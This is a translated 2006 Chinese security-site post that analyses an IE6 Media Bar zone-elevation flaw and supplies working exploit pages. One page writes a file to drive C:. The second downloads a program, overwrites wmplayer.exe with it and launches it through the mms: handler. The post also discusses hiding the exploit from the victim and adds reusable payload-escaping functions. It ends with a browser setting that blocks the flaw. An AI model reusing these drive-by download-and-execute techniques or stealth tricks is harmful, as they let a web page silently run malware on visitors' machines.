MediaPlayer + IE6: a brief look at the latest vulnerability - Vulnerability Alert - 黑吧安全网 (Heiba Security Net)

ID MYHACK58:6220069345
Type myhack58
Reporter 佚名 (Anonymous)
Modified 2006-05-26T00:00:00


This vulnerability only affects IE 6.0 and later, because IE 6 was the first version to support JavaScript of the form window.open("http://ip/","_media"); and that is where the main problem lies.

All of the code below was tested on XP + WMP 8.0 + IE 6.0.1 + IIS 6.0. XP and IE had every Microsoft patch available through Windows Update as of the time of posting, and the vulnerability still exists.

Look at the following code:

<html>
<body>
<textarea id="code" style="display:none">var s=new ActiveXObject(\"ADODB.Stream\");s.Type=2;s.Open();s.WriteText(\"ie bug test ok\");s.SaveToFile(\"c:\\\\bugtest.txt\",1);</textarea>
<!-- note: the textarea content must stay on one line, with no line breaks -->
<script>
url="file:javascript:eval(decodeURI(\""+document.all.code.value+"\"))"; // the forum software inserts a space into "javascript"; it must read javascript: here
window.open(url,"_media"); // this is the line that matters
</script>
write a file bugtest.txt to c:
</body>
</html>

Save the code as ie6bug.htm and open it locally with IE. The result: a file named bugtest.txt is created on drive C:, and the IE window that opens has an extra "Media Bar". Put ie6bug.htm on IIS and access it via http://ip/ie6bug.htm, and the vulnerability still works. Somewhat "scary", isn't it?

If you change window.open(url,"_media") to window.open(url), you get the security warning "The security settings on this computer prohibit accessing data sources in another domain." That is to be expected: whether the HTML file is opened locally or accessed over the web, IE's security zone (what I call the "domain environment" below) is "Internet", and in the normal case a page can only read and write the IE cache and a few other places. But Microsoft seems to have made a mistake: when a new window has the "Media Bar" enabled, its zone becomes "My Computer", i.e. the local machine zone. Execute window.open("about:blank","_media"); on its own and you can watch this change in the IE status bar.

However, "_media" is not the whole story. If you remove the "file:" prefix from the url, opening the page locally still works fine, but when it is accessed remotely as a web page you get a "no permission" warning. As for why "_media" + "file:" causes the zone change, I don't know.

Incidentally, using "_search" instead of "_media" does not produce the vulnerability.

Since any program can be written to the local disk, all that remains is to get it to run. The method in the vulnerability description is: download a malicious program, overwrite wmplayer.exe with it, then set location.href="mms:"; this invokes wmplayer.exe before Windows File Protection takes effect, so the malicious program executes. You can also replace telnet.exe and run it with location.href="telnet:". The principle is very simple, but to be of practical value the "invisibility" problem also has to be solved.

Whenever target="_media" is used there is always a "Media Bar", even when it is done through an <iframe> or <frame>: <iframe src="url" target="_media" height="1" width="1"></iframe>

Open a new window first, call window.open(url,"_media") from inside it, then close that window: both the parent window and the child window end up with a "Media Bar". The child window can be closed, but that does nothing for the parent window.

Using showModalDialog instead of open does not work either.

I tried many ways and could not hide the "Media Bar". The method used in the vulnerability description is: first window.open(url,"_media"), then window.open("error.jsp","_media"); accessing error.jsp returns an error, and the "Media Bar" disappears. In my test this did not succeed, because the patch is installed. Microsoft's patch, however, seems only to make the returned error leave the "Media Bar" in place; the zone change still happens, so the vulnerability still exists. In fact, once the malicious program can run, it can find the new window by its name and close it, then open a normal one, and so it is hidden. On XP, windows of the same group share one taskbar button, so a change in the number of windows is not obvious.

Whoever finds a good way to hide it, please share.

I modified the code from the vulnerability disclosure a bit and removed the part that tries to get rid of the "Media Bar", since it is useless once the patch is installed.

<html>
<body>
<textarea id="code" style="display:none">
var h=new ActiveXObject("Microsoft.XMLHTTP");
h.open("GET","",false);
h.send();
var s=new ActiveXObject("ADODB.Stream");
s.type=1;
s.open();
s.write(h.responseBody);
s.savetofile("c:\\program files\\windows media player\\wmplayer.exe",2);
s.close();
location.href="mms:";
</textarea>
<script>
var url=document.all.code.value;
url=url.replace(/\r\n/g,"");      // strip line breaks so the payload fits in one string literal
url=url.replace(/\\/g,"\\\\");    // double the backslashes in the Windows path
url=url.replace(/\"/g,"\\\"");    // escape the double quotes
url=url.replace(/\//g,"%2f");     // hide "/" from the URL handler
window.open("file:javascript:eval(decodeURI(\""+url+"\"))","_media"); // the forum software inserts a space into "javascript"; it must read javascript: here
</script>
ie6 bug test.
</body>
</html>

(The GET URL in h.open is left blank here; it is the location the program is downloaded from.)
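The escaping performed by the <script> block above is the part of the page most easily got wrong, so here is an added example (not code from the original page) that isolates it as a function and round-trips a constructed payload the way the javascript: URL would unpack it. Two things worth knowing: the function names escapePayload, buildMediaUrl and recoverPayload are my own, and the original relies on decodeURI(), which by the ECMAScript specification does not decode %2f because "/" is a reserved character. The round-trip below therefore uses decodeURIComponent(), which does; whatever undid the %2f in IE's file: URL handling is outside this example.

```javascript
// Added example: the payload escaping used by the second test page,
// written as reusable functions and checked by a round-trip.
//
// The textarea text ends up inside a double-quoted JS string literal
// that itself sits inside a file:javascript: URL, so:
//   1. line breaks are removed (a raw newline would end the literal),
//   2. backslashes in Windows paths are doubled,
//   3. double quotes become \",
//   4. "/" becomes %2f so the URL layer does not see a path separator.
// A literal "%" in the payload is not handled, exactly as in the original;
// decodeURIComponent() would throw a URIError on a malformed sequence.

function escapePayload(payload) {
  return payload
    .replace(/\r?\n/g, "")    // same as the page's /\r\n/g, but also bare \n
    .replace(/\\/g, "\\\\")   // \  -> \\
    .replace(/"/g, '\\"')     // "  -> \"
    .replace(/\//g, "%2f");   // /  -> %2f
}

function buildMediaUrl(payload) {
  // The original page passes this string to window.open(url, "_media").
  return 'file:javascript:eval(decodeURI("' + escapePayload(payload) + '"))';
}

// Simulate what the javascript: handler does with the URL body: parse the
// quoted string literal, then URI-decode it. The code that would be eval'd
// is returned as a string instead of being executed.
function recoverPayload(url) {
  const prefix = 'file:javascript:eval(decodeURI(';
  const suffix = '))';
  if (!url.startsWith(prefix) || !url.endsWith(suffix)) {
    throw new Error("not a file:javascript:eval(decodeURI(...)) URL");
  }
  const literal = url.slice(prefix.length, url.length - suffix.length);
  // Evaluating a bare string literal only yields its string value.
  const unescaped = eval(literal);
  // decodeURIComponent, not decodeURI: the latter leaves %2f untouched.
  return decodeURIComponent(unescaped);
}

// Constructed sample payload in the shape of the page's first test:
// a textarea would hold exactly this text (two literal backslashes).
const samplePayload =
  'var s=new ActiveXObject("ADODB.Stream");\r\n' +
  's.SaveToFile("c:\\\\bugtest.txt",1);';

console.log(buildMediaUrl(samplePayload));
console.log(recoverPayload(buildMediaUrl(samplePayload)));
```

The second console.log prints the textarea text with its line break removed and everything else intact, which is what the eval inside the media-bar window would receive.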

Before testing the code, back up wmplayer.exe first. Windows File Protection will restore it, but just in case. The result of running it is that a program is launched: the English-language msconfig.exe. That program was downloaded from sometips and is about 101k. If your network is slow, the page will also be slow to open. If WFP restores the file while msconfig is running, a tmp file appears in the Windows Media Player directory; it is actually msconfig.exe.

Blocking the vulnerability is very simple: in IE, under Tools -> Internet Options -> Advanced -> Multimedia, check "Don't display online media content in the media bar". Everyone should hurry up and set it before getting caught by the trick on some "hacker" site.